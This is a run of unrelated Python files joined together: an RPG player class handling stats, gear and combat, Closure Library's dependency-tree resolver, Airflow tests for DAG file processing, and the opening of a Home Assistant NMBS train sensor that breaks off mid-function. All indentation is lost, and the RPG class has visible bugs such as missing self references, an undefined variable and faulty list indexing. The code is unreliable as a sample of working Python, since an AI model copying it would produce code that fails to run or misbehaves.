# Initialize gear slots and give player basic gear.
self.initGear()
self.assignStarterGear()
# Initialize combat abilities.
self.initAbilities()
# Purpose: Assigns the player stats based on race and profession.
# Parameters: None
# Return: Void
def assignStats(self):
# Initialize all player stats to default values.
self.initStats()
# Adjust player stats according to race and profession.
self.adjustStatsRace()
self.adjustStatsProf()
# Purpose: Initializes player stats to default values.
# Parameters: None
# Return: Void
def initStats(self):
self.initBasicStats()
self.initResistStats()
self.initAttackStats()
# Purpose: Assigns the player default stats.
# Parameters: None
# Return: Void
def initBasicStats(self):
# Initialize and declare health and power
self.max_hp = 20
self.curr_hp = 20
self.max_energy = 20
self.curr_energy = 20
self.defense = 0
self.damage = 0
# Initialize and declare strength, wisdom, dexterity, charisma,
# luck, and perception stats.
self.str = 5
self.wis = 5
self.dex = 5
self.cha = 5
self.lck = 5
self.per = 5
# Purpose: Assigns the player damage-resist default stats.
# Parameters: None
# Return: Void
def initResistStats(self):
self.poison_resist = 0
self.fire_resist = 0
self.cold_resist = 0
self.electric_resist = 0
self.earth_resist = 0
# Purpose: Assigns the player special attack stats.
# Parameters: None
# Return: Void
def initAttackStats(self):
self.poison_dmg = 0
self.cold_dmg = 0
self.fire_dmg = 0
self.electric_dmg = 0
self.earth_dmg = 0
# Purpose: Adjusts player stats according to character race.
# Parameters: None
# Return: Void
def adjustStatsRace(self):
# Assign stats for each race.
if self.race == "Human":
self.max_hp += 3
self.curr_hp += 3
self.max_energy += 3
self.curr_energy += 3
self.str += 1
self.wis += 1
self.cha += 1
self.fire_resist += 1
elif self.race == "Dwarf":
self.max_hp += 6
self.curr_hp += 6
self.str += 1
self.dex += 1
self.lck += 1
self.electric_resist += 1
elif self.race == "Elf":
self.max_energy += 6
self.curr_energy += 6
self.dex += 1
self.wis += 1
self.per += 1
self.poison_resist += 1
# Purpose: Adjusts player stats according to character profession.
# Parameters: None
# Return: Void
def adjustStatsProf(self):
# Assign warrior prof stats.
if self.prof == "Warrior":
self.str += 1
self.lck += 1
self.earth_resist += 1
self.electric_resist -= 1
# Assign mage prof stats.
elif self.prof == "Mage":
self.wis += 1
self.cha += 1
self.fire_resist += 1
self.earth_resist -= 1
# Assign ranger prof stats.
elif self.prof == "Ranger":
self.dex += 1
self.per += 1
self.poison_resist += 1
self.cold_resist -= 1
# Purpose: Initializes player gear slots.
# Parameters: None
# Return: Void
def initGear(self):
self.armor = None
self.weapon = None
self.ring = None
# Purpose: Gives the player default gear according to profession.
# Parameters: None
# Return: Void
def assignStarterGear(self):
pass
self.addItem("Apple", 3)
self.calcDamage()
# Purpose: Equip a piece of armor.
# Parameters: The index of the piece of armor in the inventory.
# Return: Void
def equipArmor(self, index):
if inv[index].type != "Armor" or inv[index].prof != self.prof:
print("You can't wear that!")
return
# Equip the armor.
self.armor = self.inv.pop(index)
# Give the player the armor stats.
self.defense += self.armor.defense
self.poison_resist += self.armor.poison_resist
self.fire_resist += self.armor.fire_resist
self.cold_resist += self.armor.cold_resist
self.electric_resist += self.armor.electric_resist
self.earth_resist += self.armor.earth_resist
# Purpose: Unequip a piece of armor.
# Parameters: None
# Return: Void
def unequipArmor(self):
if self.armor == None:
print("You have no armor to unequip!")
return
# Adjust player stats accordingly.
self.defense -= self.armor.defense
self.poison_resist -= self.armor.poison_resist
self.fire_resist -= self.armor.fire_resist
self.cold_resist -= self.armor.cold_resist
self.electric_resist -= self.armor.electric_resist
self.earth_resist -= self.armor.earth_resist
# Finish taking the armor off.
self.inv.append(self.armor)
self.armor = None
# Purpose: Equip a weapon.
# Parameters: The inventory index of the weapon to equip.
# Return: Void
def equipWeapon(self, index):
if inv[index].type != "Weapon" or inv[index].prof != self.prof:
print("That's not a weapon!")
return
# Equip the weapon.
self.weapon = self.inv.pop(index)
# Give the player the weapon stats.
self.poison_dmg += self.weapon.poison_dmg
self.fire_dmg += self.weapon.fire_dmg
self.cold_dmg += self.weapon.cold_dmg
self.electric_dmg += self.weapon.electric_dmg
self.earth_dmg += self.weapon.earth_dmg
self.defense += self.weapon.defense
self.poison_resist += self.weapon.poison_resist
self.fire_resist += self.weapon.fire_resist
self.cold_resist += self.weapon.cold_resist
self.electric_resist += self.weapon.electric_resist
self.earth_resist += self.weapon.earth_resist
self.calcDamage()
# Purpose: Unequip a weapon.
# Parameters: None
# Return: Void
def unequipWeapon(self):
if self.weapon == None:
print("You have no weapon to unequip!")
return
# Adjust player stats accordingly.
self.poison_dmg -= self.weapon.poison_dmg
self.fire_dmg -= self.weapon.fire_dmg
self.cold_dmg -= self.weapon.cold_dmg
self.electric_dmg -= self.weapon.electric_dmg
self.earth_dmg -= self.weapon.earth_dmg
self.defense -= self.weapon.defense
self.poison_resist -= self.weapon.poison_resist
self.fire_resist -= self.weapon.fire_resist
self.cold_resist -= self.weapon.cold_resist
self.electric_resist -= self.weapon.electric_resist
self.earth_resist -= self.weapon.earth_resist
# Take the weapon off and recalculate damage.
self.inv.append(self.weapon)
self.weapon = None
self.calcDamage()
# Purpose: Equip a ring.
# Parameters: The inventory index of the ring to equip.
# Return: Void
def equipRing(self, index):
if inv[index].type != "Ring":
print("That's not a ring!")
return
# Equip the ring.
self.ring = self.inv.pop(index)
# Give the player ring stats.
self.str += self.ring.str
self.wis += self.ring.wis
self.dex += self.ring.dex
self.cha += self.ring.cha
self.lck += self.ring.lck
self.per += self.ring.per
# Recalculate damage.
self.calcDamage()
# Purpose: Unequip a ring.
# Parameters: None
# Return: Void
def unequipRing(self):
if self.ring == None:
print("You have no ring to unequip!")
return
# Adjust player stats accordingly.
self.str -= self.ring.str
self.wis -= self.ring.wis
self.dex -= self.ring.dex
self.cha -= self.ring.cha
self.lck -= self.ring.lck
self.per -= self.ring.per
# Take the ring off and recalculate damage.
self.inv.append(self.ring)
self.ring = None
self.calcDamage()
# Purpose: Calculate player damage (without elemental damage).
# Parameters: None
# Return: Void
def calcDamage(self):
# If the player has no weapon:
if self.weapon == None:
self.damage = 1 * (self.str / 2)
return
# Calculate damage according to weapons for each profession.
self.damage = self.weapon.damage
if self.prof == "Warrior":
self.damage += (self.str * 2)
elif self.prof == "Mage":
self.damage += (self.wis * 2)
elif self.prof == "Ranger":
self.damage += (self.dex * 2)
# Purpose: Take the given Damage.
# Parameters: A Damage instance and a double protection modifier, which
# defaults to .075.
# Return: Amount of damage dealt.
def takeDamage(self, damage_received):
# Check if the attack misses
miss_chance = int(self.lck + (self.dex * 0.5))
miss = random.randrange(0, 101)
if (miss <= miss_chance):
return 0
# Calculate whether or not modifier is negative
negative = random.randrange(0,2)
# Calculate a modifier for damage taken
modifier = random.randrange(0, self.defense * mult_modifier)
if (negative != 0):
modifier *= -1
# Check for elemental resistances
if damage_received.ele_type == "Electric":
damage_received.ele_dmg -= self.electric_resist
elif damage_received.ele_type == "Fire":
damage_received.ele_dmg -= self.fire_resist
elif damage_received.ele_type == "Cold":
damage_received.ele_dmg -= self.cold_resist
elif damage_received.ele_type == "Earth":
damage_received.ele_dmg -= self.earth_resist
elif damage_received.ele_type == "Poison":
damage_received.ele_dmg -= self.poison_resist
# Check for regular defense and get total, and check for death
total_dmg = ((damage_received.reg_damage - self.defense) +
damage_received.ele_dmg) * modifier
self.curr_hp -= total_dmg
if self.curr_hp <= 0:
die()
return total_dmg
# Purpose: "Kills" the player upon death.
# Parameters: None
# Return: Void
def die(self):
pass
# Purpose: Get damage done for an attack, stored in a Damage instance.
# Parameters: A string elemental damage type and a double modifier to
# add/subtract from, which defaults to .2.
# Return: A Damage instance to pass to the target.
def doDamage(self, ele_type, mult_modifier = 0.2):
# Calculate whether or not the modifier will be negative
negative = random.randrange(0, 2)
# Calculate the damage done with a modifier.
modifier = random.randrange(0, self.damage * mult_modifier)
if negative != 0:
modifier *= -1;
damage_dealt = self.damage + modifier
# Return the damage to deal.
if ele_type == "Electric":
return damage.Damage(damage_dealt, self.electric_dmg, ele_type)
elif ele_type == "Fire":
return damage.Damage(damage_dealt, self.fire_dmg, ele_type)
elif ele_type == "Cold":
return damage.Damage(damage_dealt, self.cold_dmg, ele_type)
elif ele_type == "Earth":
return damage.Damage(damage_dealt, self.earth_dmg, ele_type)
elif ele_type == "Poison":
return damage.Damage(damage_dealt, self.poison_dmg, ele_type)
# Purpose: Initialize player's abilities according to class. Abilities
# are "given" to the player at start and unlocked over time.
# Parameters: None
# Return: Void
def initAbilities(self):
pass
# Purpose: Gives the player a certain amount of the given item.
# Parameters: A string item to give the player, and an optional amount of
# items to give.
# Return: Void
def addItem(self, itemName, amt = 1):
for i in range(amt):
newItem = item.Item(itemName)
self.inv.append(newItem)
# Purpose: Returns true if the player has an item with the given string
# name, false otherwise.
# Parameters: A string name of an item to search for
# Return: True if the player has an item with the given name, false
# otherwise.
def hasItem(self, item):
for i in self.inv:
if self.inv[i].name == item:
return True
# Return false if item not found
return False
# Purpose: Removes the item with the given name from the player.
# Parameters: A string item name to take from the player.
# Return: Void
def takeItem(self, item):
if hasItem(item):
for i in self.inv:
if self.inv[i].name == item:
self.inv.pop(i)
return
else:
print("Sorry, you don't have that item.")
# Purpose: Give the player the given amount of gold.
# Parameters: An int amount of gold to add.
# Return: Void
def addGold(self, amtGold):
self.gold += amtGold
# Purpose: Returns true if the player has the given amount of gold,
# false otherwise.
# Parameters: An int amount of gold to check for.
# Return: True if the player has the given amount of gold, false
# otherwise.
def hasGold(self, amtGold):
if self.gold < amtGold:
return False
return True
# Purpose: Remove the given amount of gold from the player.
# Parameters: An int amount of gold to take from the player.
# Return: None
def takeGold(self, amtGold):
if self.hasGold(amtGold):
self.gold -= amtGold
else:
print("Sorry, you don't have enough gold")
# Purpose: Gives the Player a current zone.
# Parameters: Two ints representing the x and y coordinates of the
# player's current zone.
# Return: Void
def setZone(self, zone_x, zone_y):
self.x_coord = zone_x
self.y_coord = zone_y
self.loc = self.map.zones[x_coord][y_coord]
# Purpose: Moves the player north.
# Parameters: None
# Return: Void
def moveNorth(self):
pass
# Purpose: Moves the player east.
# Parameters: None
# Return: Void
def moveEast(self):
pass
# Purpose: Moves the player south.
# Parameters: None
# Return: Void
def moveSouth(self):
pass
# Purpose: Moves the player west.
# Parameters: None
# Return: Void
def moveWest(self):
pass
| |
# Copyright 2009 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class to represent a full Closure Library dependency tree.
Offers a queryable tree of dependencies of a given set of sources. The tree
will also do logical validation to prevent duplicate provides and circular
dependencies.
"""
__author__ = 'nnaze@google.com (Nathan Naze)'
import re
_REQUIRES_ALL_REGEX = re.compile('(.+)\.\*')
class DepsTree(object):
"""Represents the set of dependencies between source files."""
def __init__(self, sources):
"""Initializes the tree with a set of sources.
Args:
sources: A set of JavaScript sources.
Raises:
MultipleProvideError: A namespace is provided by muplitple sources.
NamespaceNotFoundError: A namespace is required but never provided.
"""
self._sources = sources
self._provides_map = dict()
self._provides_map_tree = dict()
# Ensure nothing was provided twice.
for source in sources:
for provide in source.provides:
if provide in self._provides_map:
raise MultipleProvideError(
provide, [self._provides_map[provide], source])
self._provides_map[provide] = source
DepsTree.addProvide(self._provides_map_tree, provide, source)
# Check that all required namespaces are provided.
for source in sources:
for require in source.requires:
require_all = _REQUIRES_ALL_REGEX.match(require)
if not require_all and require not in self._provides_map:
raise NamespaceNotFoundError(require, source)
@staticmethod
def getRequire(provide_map, require):
names=require.split(".", 1)
if names[0] == "*":
sources = []
for key in provide_map:
obj = provide_map[key]
if type(obj) is dict:
sources = sources + DepsTree.getRequire(obj, "*")
else:
sources.append(obj)
return sources
current=provide_map[names[0]]
if names[0] == require:
return [current["__source__"]]
elif type(current) is dict:
return DepsTree.getRequire(current, names[1])
else:
return []
@staticmethod
def addProvide(map, provide, source):
names=provide.split(".", 1)
if not names[0] in map:
map[names[0]] = dict()
if names[0] == provide:
map[provide]["__source__"] = source
else:
DepsTree.addProvide(map[names[0]], names[1], source)
def GetDependencies(self, required_namespaces):
"""Get source dependencies, in order, for the given namespaces.
Args:
required_namespaces: A string (for one) or list (for one or more) of
namespaces.
Returns:
A list of source objects that provide those namespaces and all
requirements, in dependency order.
Raises:
NamespaceNotFoundError: A namespace is requested but doesn't exist.
CircularDependencyError: A cycle is detected in the dependency tree.
"""
if isinstance(required_namespaces, str):
required_namespaces = [required_namespaces]
deps_sources = []
for namespace in required_namespaces:
for source in DepsTree._ResolveDependencies(
namespace, [], self._provides_map, self._provides_map_tree, []):
if source not in deps_sources:
deps_sources.append(source)
return deps_sources
@staticmethod
def _ResolveDependencies(required_namespace, deps_list, provides_map, provides_map_tree,
traversal_path):
"""Resolve dependencies for Closure source files.
Follows the dependency tree down and builds a list of sources in dependency
order. This function will recursively call itself to fill all dependencies
below the requested namespaces, and then append its sources at the end of
the list.
Args:
required_namespace: String of required namespace.
deps_list: List of sources in dependency order. This function will append
the required source once all of its dependencies are satisfied.
provides_map: Map from namespace to source that provides it.
traversal_path: List of namespaces of our path from the root down the
dependency/recursion tree. Used to identify cyclical dependencies.
This is a list used as a stack -- when the function is entered, the
current namespace is pushed and popped right before returning.
Each recursive call will check that the current namespace does not
appear in the list, throwing a CircularDependencyError if it does.
Returns:
The given deps_list object filled with sources in dependency order.
Raises:
NamespaceNotFoundError: A namespace is requested but doesn't exist.
CircularDependencyError: A cycle is detected in the dependency tree.
"""
sources = DepsTree.getRequire(provides_map_tree, required_namespace)
for source in sources:
if not source:
raise NamespaceNotFoundError(required_namespace)
if required_namespace in traversal_path:
traversal_path.append(required_namespace) # do this *after* the test
# This must be a cycle.
raise CircularDependencyError(traversal_path)
# If we don't have the source yet, we'll have to visit this namespace and
# add the required dependencies to deps_list.
if source not in deps_list:
traversal_path.append(required_namespace)
for require in source.requires:
# Append all other dependencies before we append our own.
DepsTree._ResolveDependencies(require, deps_list, provides_map, provides_map_tree,
traversal_path)
deps_list.append(source)
traversal_path.pop()
return deps_list
class BaseDepsTreeError(Exception):
"""Base DepsTree error."""
def __init__(self):
Exception.__init__(self)
class CircularDependencyError(BaseDepsTreeError):
"""Raised when a dependency cycle is encountered."""
def __init__(self, dependency_list):
BaseDepsTreeError.__init__(self)
self._dependency_list = dependency_list
def __str__(self):
return ('Encountered circular dependency:\n%s\n' %
'\n'.join(self._dependency_list))
class MultipleProvideError(BaseDepsTreeError):
"""Raised when a namespace is provided more than once."""
def __init__(self, namespace, sources):
BaseDepsTreeError.__init__(self)
self._namespace = namespace
self._sources = sources
def __str__(self):
source_strs = map(str, self._sources)
return ('Namespace "%s" provided more than once in sources:\n%s\n' %
(self._namespace, '\n'.join(source_strs)))
class NamespaceNotFoundError(BaseDepsTreeError):
"""Raised when a namespace is requested but not provided."""
def __init__(self, namespace, source=None):
BaseDepsTreeError.__init__(self)
self._namespace = namespace
self._source = source
def __str__(self):
msg = 'Namespace "%s" never provided.' % self._namespace
if self._source:
msg += ' Required in %s' % self._source
return msg
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import pathlib
import sys
import tempfile
import unittest
from datetime import datetime, timedelta
from unittest import mock
from unittest.mock import MagicMock, PropertyMock
from airflow.configuration import conf
from airflow.jobs.local_task_job import LocalTaskJob as LJ
from airflow.jobs.scheduler_job import DagFileProcessorProcess
from airflow.models import DagBag, TaskInstance as TI
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.utils import timezone
from airflow.utils.dag_processing import DagFileProcessorAgent, DagFileProcessorManager, DagFileStat
from airflow.utils.file import correct_maybe_zipped
from airflow.utils.session import create_session
from airflow.utils.state import State
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_runs
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), os.pardir, 'dags')
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
SETTINGS_FILE_VALID = """
LOGGING_CONFIG = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'airflow.task': {
'format': '[%(asctime)s] {%(process)d %(filename)s:%(lineno)d} %(levelname)s - %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'airflow.task',
'stream': 'ext://sys.stdout'
},
'task': {
'class': 'logging.StreamHandler',
'formatter': 'airflow.task',
'stream': 'ext://sys.stdout'
},
},
'loggers': {
'airflow': {
'handlers': ['console'],
'level': 'INFO',
'propagate': False
},
'airflow.task': {
'handlers': ['task'],
'level': 'INFO',
'propagate': False,
},
}
}
"""
SETTINGS_DEFAULT_NAME = 'custom_airflow_local_settings'
class settings_context: # pylint: disable=invalid-name
"""
Sets a settings file and puts it in the Python classpath
:param content:
The content of the settings file
"""
def __init__(self, content, directory=None, name='LOGGING_CONFIG'):
self.content = content
self.settings_root = tempfile.mkdtemp()
filename = "{}.py".format(SETTINGS_DEFAULT_NAME)
if directory:
# Replace slashes by dots
self.module = directory.replace('/', '.') + '.' + SETTINGS_DEFAULT_NAME + '.' + name
# Create the directory structure
dir_path = os.path.join(self.settings_root, directory)
pathlib.Path(dir_path).mkdir(parents=True, exist_ok=True)
# Add the __init__ for the directories
# This is required for Python 2.7
basedir = self.settings_root
for part in directory.split('/'):
open(os.path.join(basedir, '__init__.py'), 'w').close()
basedir = os.path.join(basedir, part)
open(os.path.join(basedir, '__init__.py'), 'w').close()
self.settings_file = os.path.join(dir_path, filename)
else:
self.module = SETTINGS_DEFAULT_NAME + '.' + name
self.settings_file = os.path.join(self.settings_root, filename)
def __enter__(self):
with open(self.settings_file, 'w') as handle:
handle.writelines(self.content)
sys.path.append(self.settings_root)
conf.set(
'logging',
'logging_config_class',
self.module
)
return self.settings_file
def __exit__(self, *exc_info):
# shutil.rmtree(self.settings_root)
# Reset config
conf.set('logging', 'logging_config_class', '')
sys.path.remove(self.settings_root)
class TestDagFileProcessorManager(unittest.TestCase):
def setUp(self):
clear_db_runs()
def test_set_file_paths_when_processor_file_path_not_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
file_paths=['abc.txt'],
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
async_mode=True)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError(
'DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['missing_file.txt'] = mock_processor
manager._file_stats['missing_file.txt'] = DagFileStat(0, 0, None, None, 0)
manager.set_file_paths(['abc.txt'])
self.assertDictEqual(manager._processors, {})
def test_set_file_paths_when_processor_file_path_is_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
file_paths=['abc.txt'],
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
async_mode=True)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError(
'DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['abc.txt'] = mock_processor
manager.set_file_paths(['abc.txt'])
self.assertDictEqual(manager._processors, {'abc.txt': mock_processor})
def test_find_zombies(self):
manager = DagFileProcessorManager(
dag_directory='directory',
file_paths=['abc.txt'],
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
async_mode=True)
dagbag = DagBag(TEST_DAG_FOLDER)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('example_branch_operator')
task = dag.get_task(task_id='run_this_first')
ti = TI(task, DEFAULT_DATE, State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
local_job.id = 1
ti.job_id = local_job.id
session.add(local_job)
session.add(ti)
session.commit()
manager._last_zombie_query_time = timezone.utcnow() - timedelta(
seconds=manager._zombie_threshold_secs + 1)
manager._find_zombies() # pylint: disable=no-value-for-parameter
zombies = manager._zombies
self.assertEqual(1, len(zombies))
self.assertIsInstance(zombies[0], SimpleTaskInstance)
self.assertEqual(ti.dag_id, zombies[0].dag_id)
self.assertEqual(ti.task_id, zombies[0].task_id)
self.assertEqual(ti.execution_date, zombies[0].execution_date)
session.query(TI).delete()
session.query(LJ).delete()
def test_zombies_are_correctly_passed_to_dag_file_processor(self):
"""
Check that the same set of zombies are passed to the dag
file processors until the next zombie detection logic is invoked.
"""
with conf_vars({('scheduler', 'max_threads'): '1',
('core', 'load_examples'): 'False'}):
dagbag = DagBag(os.path.join(TEST_DAG_FOLDER, 'test_example_bash_operator.py'))
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('test_example_bash_operator')
task = dag.get_task(task_id='run_this_last')
ti = TI(task, DEFAULT_DATE, State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
local_job.id = 1
ti.job_id = local_job.id
session.add(local_job)
session.add(ti)
session.commit()
fake_zombies = [SimpleTaskInstance(ti)]
class FakeDagFileProcessorRunner(DagFileProcessorProcess):
# This fake processor will return the zombies it received in constructor
# as its processing result w/o actually parsing anything.
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
super().__init__(file_path, pickle_dags, dag_id_white_list, zombies)
self._result = zombies, 0
def start(self):
pass
@property
def start_time(self):
return DEFAULT_DATE
@property
def pid(self):
return 1234
@property
def done(self):
return True
@property
def result(self):
return self._result
def processor_factory(file_path, zombies):
return FakeDagFileProcessorRunner(
file_path,
False,
[],
zombies
)
test_dag_path = os.path.join(TEST_DAG_FOLDER,
'test_example_bash_operator.py')
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
processor_agent = DagFileProcessorAgent(test_dag_path,
[],
1,
processor_factory,
timedelta.max,
async_mode)
processor_agent.start()
parsing_result = []
if not async_mode:
processor_agent.heartbeat()
while not processor_agent.done:
if not async_mode:
processor_agent.wait_until_finished()
parsing_result.extend(processor_agent.harvest_simple_dags())
self.assertEqual(len(fake_zombies), len(parsing_result))
self.assertEqual(set(zombie.key for zombie in fake_zombies),
set(result.key for result in parsing_result))
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.kill")
def test_kill_timed_out_processors_kill(self, mock_kill, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
file_paths=['abc.txt'],
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
async_mode=True)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.min)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_kill.assert_called_once_with()
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess")
def test_kill_timed_out_processors_no_kill(self, mock_dag_file_processor, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
file_paths=['abc.txt'],
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
async_mode=True)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.max)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_dag_file_processor.kill.assert_not_called()
class TestDagFileProcessorAgent(unittest.TestCase):
def setUp(self):
# Make sure that the configure_logging is not cached
self.old_modules = dict(sys.modules)
def tearDown(self):
# Remove any new modules imported during the test run. This lets us
# import the same source files for more than one test.
for mod in sys.modules:
if mod not in self.old_modules:
del sys.modules[mod]
def test_reload_module(self):
"""
Configure the context to have logging.logging_config_class set to a fake logging
class path, thus when reloading logging module the airflow.processor_manager
logger should not be configured.
"""
with settings_context(SETTINGS_FILE_VALID):
# Launch a process through DagFileProcessorAgent, which will try
# reload the logging module.
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(file_path,
False,
[],
zombies)
test_dag_path = os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py')
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path,
[],
0,
processor_factory,
timedelta.max,
async_mode)
processor_agent.start()
if not async_mode:
processor_agent.heartbeat()
processor_agent._process.join()
# Since we are reloading logging config not creating this file,
# we should expect it to be nonexistent.
self.assertFalse(os.path.isfile(log_file_loc))
def test_parse_once(self):
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(file_path,
False,
[],
zombies)
test_dag_path = os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py')
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
processor_agent = DagFileProcessorAgent(test_dag_path,
[test_dag_path],
1,
processor_factory,
timedelta.max,
async_mode)
processor_agent.start()
parsing_result = []
if not async_mode:
processor_agent.heartbeat()
while not processor_agent.done:
if not async_mode:
processor_agent.wait_until_finished()
parsing_result.extend(processor_agent.harvest_simple_dags())
dag_ids = [result.dag_id for result in parsing_result]
self.assertEqual(dag_ids.count('test_start_date_scheduling'), 1)
def test_launch_process(self):
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(file_path,
False,
[],
zombies)
test_dag_path = os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py')
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path,
[],
0,
processor_factory,
timedelta.max,
async_mode)
processor_agent.start()
if not async_mode:
processor_agent.heartbeat()
processor_agent._process.join()
self.assertTrue(os.path.isfile(log_file_loc))
class TestCorrectMaybeZipped(unittest.TestCase):
@mock.patch("zipfile.is_zipfile")
def test_correct_maybe_zipped_normal_file(self, mocked_is_zipfile):
path = '/path/to/some/file.txt'
mocked_is_zipfile.return_value = False
dag_folder = correct_maybe_zipped(path)
self.assertEqual(dag_folder, path)
@mock.patch("zipfile.is_zipfile")
def test_correct_maybe_zipped_normal_file_with_zip_in_name(self, mocked_is_zipfile):
path = '/path/to/fakearchive.zip.other/file.txt'
mocked_is_zipfile.return_value = False
dag_folder = correct_maybe_zipped(path)
self.assertEqual(dag_folder, path)
@mock.patch("zipfile.is_zipfile")
def test_correct_maybe_zipped_archive(self, mocked_is_zipfile):
path = '/path/to/archive.zip/deep/path/to/file.txt'
mocked_is_zipfile.return_value = True
dag_folder = correct_maybe_zipped(path)
assert mocked_is_zipfile.call_count == 1
(args, kwargs) = mocked_is_zipfile.call_args_list[0]
self.assertEqual('/path/to/archive.zip', args[0])
self.assertEqual(dag_folder, '/path/to/archive.zip')
| |
"""
Get ride details and liveboard details for NMBS (Belgian railway).
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.nmbs/
"""
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION, ATTR_LATITUDE, ATTR_LONGITUDE, CONF_NAME,
CONF_SHOW_ON_MAP)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'NMBS'
DEFAULT_ICON = "mdi:train"
DEFAULT_ICON_ALERT = "mdi:alert-octagon"
CONF_STATION_FROM = 'station_from'
CONF_STATION_TO = 'station_to'
CONF_STATION_LIVE = 'station_live'
CONF_EXCLUDE_VIAS = 'exclude_vias'
REQUIREMENTS = ["pyrail==0.0.3"]
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_STATION_FROM): cv.string,
vol.Required(CONF_STATION_TO): cv.string,
vol.Optional(CONF_STATION_LIVE): cv.string,
vol.Optional(CONF_EXCLUDE_VIAS, default=False): cv.boolean,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_SHOW_ON_MAP, default=False): cv.boolean,
})
def get_time_until(departure_time=None):
"""Calculate the time between now and a train's departure time."""
if departure_time is None:
return 0
delta = dt_util.utc_from_timestamp(int(departure_time)) - dt_util.now()
return round((delta.total_seconds() / 60))
def get_delay_in_minutes(delay=0):
"""Get the delay in minutes from a delay in seconds."""
return round((int(delay) / 60))
def get_ride_duration(departure_time, arrival_time, delay=0):
"""Calculate the total travel time in minutes."""
duration = dt_util.utc_from_timestamp(
int(arrival_time)) - dt_util.utc_from_timestamp(int(departure_time))
duration_time = int(round((duration.total_seconds() / 60)))
return duration_time + get_delay_in_minutes(delay)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the NMBS sensor with iRail API."""
from pyrail import iRail
api_client = iRail()
name = config[CONF_NAME]
show_on_map = config[CONF_SHOW_ON_MAP]
station_from = config[CONF_STATION_FROM]
